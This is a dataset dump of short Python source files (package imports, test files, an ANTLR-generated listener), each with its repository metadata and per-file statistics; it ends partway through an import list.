| 6,668
| 97
| 354
| 68.742268
| 0.679255
| 0.123575
| 0
| 0.222222
| 0
| 0
| 0.318868
| 0.042882
| 0
| 0
| 0.027787
| 0
| 0.888889
| 1
| 0.013889
| false
| 0
| 0.027778
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a3192e8d21b95aa21261ce543fdc902bb110549
| 173
|
py
|
Python
|
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | 4
|
2018-07-04T17:20:12.000Z
|
2019-07-14T18:07:25.000Z
|
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | null | null | null |
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | 1
|
2018-09-03T03:02:06.000Z
|
2018-09-03T03:02:06.000Z
|
# flake8: noqa
from bottleneck.slow.reduce import *
from bottleneck.slow.nonreduce import *
from bottleneck.slow.nonreduce_axis import *
from bottleneck.slow.move import *
| 24.714286
| 44
| 0.803468
| 23
| 173
| 6
| 0.434783
| 0.405797
| 0.521739
| 0.521739
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.115607
| 173
| 6
| 45
| 28.833333
| 0.895425
| 0.069364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
434e060bf7cbd5b268f2b6d721e94ff794828b33
| 96
|
py
|
Python
|
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
class HelloWorld:
@staticmethod
def get_hello_world():
return "Hello World"
| 19.2
| 29
| 0.635417
| 10
| 96
| 5.9
| 0.8
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.291667
| 96
| 4
| 30
| 24
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0.119565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4359c77027a0e3563a48ca3c9f004c79cfd4f120
| 229
|
py
|
Python
|
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | null | null | null |
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | 1
|
2022-03-08T14:54:26.000Z
|
2022-03-08T15:02:52.000Z
|
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | null | null | null |
from .add_questions import AddQuestions
from .init_questions import InitQuestions
from .generate_questions import GenerateQuestions
from .common_questions import CommonQuestions
from .settings_questions import SettingsQuestions
| 32.714286
| 49
| 0.886463
| 25
| 229
| 7.92
| 0.52
| 0.378788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091703
| 229
| 6
| 50
| 38.166667
| 0.951923
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43b9ee94611b25269011c1e467d8fd1f9ba35db7
| 83
|
py
|
Python
|
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | 1
|
2017-07-17T02:08:08.000Z
|
2017-07-17T02:08:08.000Z
|
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | null | null | null |
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | 3
|
2017-04-14T03:32:53.000Z
|
2022-02-21T02:46:49.000Z
|
from .sleepi import Sleepi
from .sleepi import Sleepi2
from .sleepi import Sleepi3
| 20.75
| 27
| 0.819277
| 12
| 83
| 5.666667
| 0.416667
| 0.441176
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028169
| 0.144578
| 83
| 3
| 28
| 27.666667
| 0.929577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43c7710f0ed8281073a19e86f5e849b449ac6f88
| 187
|
py
|
Python
|
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
s = (<error descr="Python version 3.2 does not support a 'U' prefix">u<caret></error>"string \n"
<error descr="Python version 3.2 does not support a 'U' prefix">u</error>"next line"
)
| 62.333333
| 96
| 0.679144
| 34
| 187
| 3.735294
| 0.529412
| 0.15748
| 0.251969
| 0.362205
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0
| 0.025157
| 0.149733
| 187
| 3
| 97
| 62.333333
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0.606383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6007ddb63d2d3bcb27c98533050a34d9e416799f
| 156
|
py
|
Python
|
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | null | null | null |
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | 1
|
2017-09-19T17:06:49.000Z
|
2017-09-19T17:06:49.000Z
|
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | null | null | null |
from wtl.wtparser.tests.parsers.gemfile import *
from wtl.wtparser.tests.parsers.podfile import *
from wtl.wtparser.tests.parsers.requirements_txt import *
| 39
| 57
| 0.826923
| 22
| 156
| 5.818182
| 0.454545
| 0.164063
| 0.351563
| 0.46875
| 0.726563
| 0.515625
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 156
| 3
| 58
| 52
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
60790fc85f486e526b6e5ce5e5bb49f80d9d7293
| 9,569
|
py
|
Python
|
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | null | null | null |
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | null | null | null |
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | 2
|
2021-10-14T14:38:43.000Z
|
2022-03-21T16:21:06.000Z
|
"""Test code for generating PEST files
"""
import io
import pytest
import spowtd.pestfiles as pestfiles_mod
import spowtd.recession as recession_mod
import spowtd.rise as rise_mod
from spowtd.test import conftest
reference_text = {
('rise', 'tpl', 'peatclsm'): """ptf @
specific_yield:
type: peatclsm
sd: @sd @
theta_s: @theta_s @
b: @b @
psi_s: @psi_s @
transmissivity:
type: peatclsm
Ksmacz0: 7.3 # m/s
alpha: 3 # dimensionless
zeta_max_cm: 1.0""",
('rise', 'tpl', 'spline'): """ptf @
specific_yield:
type: spline
zeta_knots_mm:
- -291.7
- -183.1
- -15.74
- 10.65
- 38.78
- 168.3
sy_knots: # Specific yield, dimensionless
- @s1 @
- @s2 @
- @s3 @
- @s4 @
- @s5 @
- @s6 @
transmissivity:
type: spline
zeta_knots_mm:
- -291.7
- -5.167
- 168.3
- 1000
K_knots_km_d: # Conductivity, km /d
- 0.005356
- 1.002
- 6577.0
- 8430.0
minimum_transmissivity_m2_d: 7.442 # Minimum transmissivity, m2 /d""",
('curves', 'tpl', 'peatclsm'): """ptf @
specific_yield:
type: peatclsm
sd: @sd @
theta_s: @theta_s @
b: @b @
psi_s: @psi_s @
transmissivity:
type: peatclsm
Ksmacz0: @Ksmacz0 @ # m/s
alpha: @alpha @ # dimensionless
zeta_max_cm: 1.0""",
('curves', 'tpl', 'spline'): """ptf @
specific_yield:
type: spline
zeta_knots_mm:
- -291.7
- -183.1
- -15.74
- 10.65
- 38.78
- 168.3
sy_knots: # Specific yield, dimensionless
- @s1 @
- @s2 @
- @s3 @
- @s4 @
- @s5 @
- @s6 @
transmissivity:
type: spline
zeta_knots_mm:
- -291.7
- -5.167
- 168.3
- 1000
K_knots_km_d: # Conductivity, km /d
- @K_knot_1 @
- @K_knot_2 @
- @K_knot_3 @
- @K_knot_4 @
minimum_transmissivity_m2_d: @T_min @ # Minimum transmissivity, m2 /d"""}
# A way of identifying the sample:
# mapping from number of distinct zetas to sample number
SAMPLE_NUMBER = {141: 1,
204: 2}
@pytest.mark.parametrize(
('parameterization', 'reference_file_contents'),
[('peatclsm', reference_text[('rise', 'tpl', 'peatclsm')]),
('spline', reference_text[('rise', 'tpl', 'spline')])])
def test_generate_rise_tpl(classified_connection,
parameterization,
reference_file_contents):
"""Generation of template files for rise curve calibration
"""
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='tpl',
configuration_file=None,
outfile=outfile)
assert (outfile.getvalue().splitlines() ==
reference_file_contents.splitlines())
def test_generate_rise_ins(classified_connection):
"""Generation of instruction files for rise curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
assert n_zeta in SAMPLE_NUMBER
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
# Parameterization doesn't matter for ins file
conftest.get_parameter_file_path('peatclsm'),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='ins',
configuration_file=None,
outfile=outfile)
with open(
conftest.get_sample_file_path('rise_calibration',
sample,
'ins'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize('parameterization',
['peatclsm', 'spline'])
def test_generate_rise_pst(classified_connection,
parameterization):
"""Generation of control files for rise curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='pst',
configuration_file=None,
outfile=outfile,
precision=5)
with open(
conftest.get_sample_file_path(
'{}_rise_calibration'.format(parameterization),
sample,
'pst'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize(
('parameterization', 'reference_file_contents'),
[('peatclsm', reference_text[('curves', 'tpl', 'peatclsm')]),
('spline', reference_text[('curves', 'tpl', 'spline')])])
def test_generate_curves_tpl(classified_connection,
parameterization,
reference_file_contents):
"""Generation of template files for master curves calibration
"""
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='tpl',
configuration_file=None,
outfile=outfile)
assert (outfile.getvalue().splitlines() ==
reference_file_contents.splitlines())
def test_generate_curves_ins(classified_connection):
"""Generation of instruction files for master curves calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
recession_mod.find_recession_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
assert n_zeta in SAMPLE_NUMBER
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
# Parameterization doesn't matter for ins file
conftest.get_parameter_file_path('peatclsm'),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='ins',
configuration_file=None,
outfile=outfile)
with open(
conftest.get_sample_file_path('curves_calibration',
sample,
'ins'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize('parameterization',
['peatclsm', 'spline'])
def test_generate_curves_pst(classified_connection,
parameterization):
"""Generation of control files for curves curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
recession_mod.find_recession_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_rise_zeta = cursor.fetchone()[0]
cursor.execute("""
SELECT count(distinct zeta_number)
FROM recession_interval_zeta""")
n_recession_zeta = cursor.fetchone()[0]
cursor.close()
sample = SAMPLE_NUMBER[n_rise_zeta]
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='pst',
configuration_file=None,
outfile=outfile,
precision=5)
with open(
conftest.get_sample_file_path(
'{}_curves_calibration'.format(parameterization),
sample,
'pst'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
| 31.068182
| 94
| 0.572578
| 956
| 9,569
| 5.466527
| 0.15272
| 0.059701
| 0.024493
| 0.029085
| 0.898584
| 0.860122
| 0.850938
| 0.850938
| 0.823
| 0.795446
| 0
| 0.023317
| 0.327725
| 9,569
| 307
| 95
| 31.169381
| 0.789056
| 0.070227
| 0
| 0.826255
| 0
| 0
| 0.309535
| 0.016493
| 0
| 0
| 0
| 0
| 0.030888
| 1
| 0.023166
| false
| 0
| 0.023166
| 0
| 0.046332
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
607fc8491f82461b6a8ae4b4d10db330f9fe08b9
| 9,903
|
py
|
Python
|
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | 1
|
2020-08-15T02:18:25.000Z
|
2020-08-15T02:18:25.000Z
|
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | null | null | null |
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | null | null | null |
# Generated from grammar.g4 by ANTLR 4.8
from antlr4 import *
if __name__ is not None and "." in __name__:
from .apt_sourceParser import apt_sourceParser
else:
from apt_sourceParser import apt_sourceParser
# This class defines a complete listener for a parse tree produced by apt_sourceParser.
class apt_sourceListener(ParseTreeListener):
# Enter a parse tree produced by apt_sourceParser#record.
def enterRecord(self, ctx:apt_sourceParser.RecordContext):
pass
# Exit a parse tree produced by apt_sourceParser#record.
def exitRecord(self, ctx:apt_sourceParser.RecordContext):
pass
# Enter a parse tree produced by apt_sourceParser#component.
def enterComponent(self, ctx:apt_sourceParser.ComponentContext):
pass
# Exit a parse tree produced by apt_sourceParser#component.
def exitComponent(self, ctx:apt_sourceParser.ComponentContext):
pass
# Enter a parse tree produced by apt_sourceParser#componentsR.
def enterComponentsR(self, ctx:apt_sourceParser.ComponentsRContext):
pass
# Exit a parse tree produced by apt_sourceParser#componentsR.
def exitComponentsR(self, ctx:apt_sourceParser.ComponentsRContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsOpt.
def enterOptionsOpt(self, ctx:apt_sourceParser.OptionsOptContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsOpt.
def exitOptionsOpt(self, ctx:apt_sourceParser.OptionsOptContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsR.
def enterOptionsR(self, ctx:apt_sourceParser.OptionsRContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsR.
def exitOptionsR(self, ctx:apt_sourceParser.OptionsRContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsList.
def enterOptionsList(self, ctx:apt_sourceParser.OptionsListContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsList.
def exitOptionsList(self, ctx:apt_sourceParser.OptionsListContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionR.
def enterOptionR(self, ctx:apt_sourceParser.OptionRContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionR.
def exitOptionR(self, ctx:apt_sourceParser.OptionRContext):
pass
# Enter a parse tree produced by apt_sourceParser#commenterROpt.
def enterCommenterROpt(self, ctx:apt_sourceParser.CommenterROptContext):
pass
# Exit a parse tree produced by apt_sourceParser#commenterROpt.
def exitCommenterROpt(self, ctx:apt_sourceParser.CommenterROptContext):
pass
# Enter a parse tree produced by apt_sourceParser#tickEnclosedString.
def enterTickEnclosedString(self, ctx:apt_sourceParser.TickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#tickEnclosedString.
def exitTickEnclosedString(self, ctx:apt_sourceParser.TickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_words_with_delF.
def enterRest_words_with_delF(self, ctx:apt_sourceParser.Rest_words_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_words_with_delF.
def exitRest_words_with_delF(self, ctx:apt_sourceParser.Rest_words_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_word_with_delF.
def enterRest_word_with_delF(self, ctx:apt_sourceParser.Rest_word_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_word_with_delF.
def exitRest_word_with_delF(self, ctx:apt_sourceParser.Rest_word_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_options_with_delF.
def enterRest_options_with_delF(self, ctx:apt_sourceParser.Rest_options_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_options_with_delF.
def exitRest_options_with_delF(self, ctx:apt_sourceParser.Rest_options_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_option_with_delF.
def enterRest_option_with_delF(self, ctx:apt_sourceParser.Rest_option_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_option_with_delF.
def exitRest_option_with_delF(self, ctx:apt_sourceParser.Rest_option_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#commenterR.
def enterCommenterR(self, ctx:apt_sourceParser.CommenterRContext):
pass
# Exit a parse tree produced by apt_sourceParser#commenterR.
def exitCommenterR(self, ctx:apt_sourceParser.CommenterRContext):
pass
# Enter a parse tree produced by apt_sourceParser#singleTickEnclosedString.
def enterSingleTickEnclosedString(self, ctx:apt_sourceParser.SingleTickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#singleTickEnclosedString.
def exitSingleTickEnclosedString(self, ctx:apt_sourceParser.SingleTickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#doubleTickEnclosedString.
def enterDoubleTickEnclosedString(self, ctx:apt_sourceParser.DoubleTickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#doubleTickEnclosedString.
def exitDoubleTickEnclosedString(self, ctx:apt_sourceParser.DoubleTickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#enclosedString.
def enterEnclosedString(self, ctx:apt_sourceParser.EnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#enclosedString.
def exitEnclosedString(self, ctx:apt_sourceParser.EnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#cdromURI.
def enterCdromURI(self, ctx:apt_sourceParser.CdromURIContext):
pass
# Exit a parse tree produced by apt_sourceParser#cdromURI.
def exitCdromURI(self, ctx:apt_sourceParser.CdromURIContext):
pass
# Enter a parse tree produced by apt_sourceParser#wordWithDashSegment.
def enterWordWithDashSegment(self, ctx:apt_sourceParser.WordWithDashSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#wordWithDashSegment.
def exitWordWithDashSegment(self, ctx:apt_sourceParser.WordWithDashSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#wordWithDash.
def enterWordWithDash(self, ctx:apt_sourceParser.WordWithDashContext):
pass
# Exit a parse tree produced by apt_sourceParser#wordWithDash.
def exitWordWithDash(self, ctx:apt_sourceParser.WordWithDashContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSquareBracketStringSegment.
def enterNonSquareBracketStringSegment(self, ctx:apt_sourceParser.NonSquareBracketStringSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSquareBracketStringSegment.
def exitNonSquareBracketStringSegment(self, ctx:apt_sourceParser.NonSquareBracketStringSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSquareBracketString.
def enterNonSquareBracketString(self, ctx:apt_sourceParser.NonSquareBracketStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSquareBracketString.
def exitNonSquareBracketString(self, ctx:apt_sourceParser.NonSquareBracketStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSpaceStringSegment.
def enterNonSpaceStringSegment(self, ctx:apt_sourceParser.NonSpaceStringSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSpaceStringSegment.
def exitNonSpaceStringSegment(self, ctx:apt_sourceParser.NonSpaceStringSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSpaceString.
def enterNonSpaceString(self, ctx:apt_sourceParser.NonSpaceStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSpaceString.
def exitNonSpaceString(self, ctx:apt_sourceParser.NonSpaceStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionValueSegment.
def enterOptionValueSegment(self, ctx:apt_sourceParser.OptionValueSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionValueSegment.
def exitOptionValueSegment(self, ctx:apt_sourceParser.OptionValueSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionValue.
def enterOptionValue(self, ctx:apt_sourceParser.OptionValueContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionValue.
def exitOptionValue(self, ctx:apt_sourceParser.OptionValueContext):
pass
# Enter a parse tree produced by apt_sourceParser#uriSchema.
def enterUriSchema(self, ctx:apt_sourceParser.UriSchemaContext):
pass
# Exit a parse tree produced by apt_sourceParser#uriSchema.
def exitUriSchema(self, ctx:apt_sourceParser.UriSchemaContext):
pass
# Enter a parse tree produced by apt_sourceParser#genericURI.
def enterGenericURI(self, ctx:apt_sourceParser.GenericURIContext):
pass
# Exit a parse tree produced by apt_sourceParser#genericURI.
def exitGenericURI(self, ctx:apt_sourceParser.GenericURIContext):
pass
# Enter a parse tree produced by apt_sourceParser#uriR.
def enterUriR(self, ctx:apt_sourceParser.UriRContext):
pass
# Exit a parse tree produced by apt_sourceParser#uriR.
def exitUriR(self, ctx:apt_sourceParser.UriRContext):
pass
del apt_sourceParser
| 36.274725
| 108
| 0.767242
| 1,111
| 9,903
| 6.656166
| 0.134113
| 0.247465
| 0.079784
| 0.143611
| 0.845166
| 0.845166
| 0.545233
| 0.5405
| 0.539824
| 0.140095
| 0
| 0.000492
| 0.178532
| 9,903
| 273
| 109
| 36.274725
| 0.908543
| 0.382207
| 0
| 0.471545
| 1
| 0
| 0.000167
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.471545
| false
| 0.471545
| 0.02439
| 0
| 0.504065
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
609d741a0b7771fcbfb65c10dba1eb353899a7f5
| 3,206
|
py
|
Python
|
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
from . import _init_rpytest_ft
# autogenerated by 'robotpy-build create-imports rpytest.ft rpytest.ft._rpytest_ft'
from ._rpytest_ft import (
Abstract,
ClassWithFields,
ClassWithIgnored,
ClassWithTrampoline,
DocAppendClass,
DocAppendEnum,
DocClass,
DocEnum,
DocTemplateAppend,
DocTemplateSet,
EnumContainer,
EnumWithIgnored,
GCEnum,
GEnum,
IBase,
IChild,
IFinal,
IGrandChild,
IMChild,
IMOther,
LTTester,
LTWithVirtual,
MVB,
MVC,
MVD0,
MVD1,
MVE,
MVF,
NSEnumContainer,
NSGCEnum,
NSGEnum,
NestedTypecaster,
Nurse,
OB,
OBInitializer,
OBinitOB,
OC,
OCInitializer,
OCinitOB,
OCinitOC,
OG,
OGinitOC,
OverloadedObject,
PBase,
PChild,
PGChild,
PatientRef,
RenamedClass,
RenamedEnum,
StaticOnly,
StripPrefixEnum,
TBase,
TBaseGetN4,
TBaseGetN6,
TBasicString,
TChildGetN4,
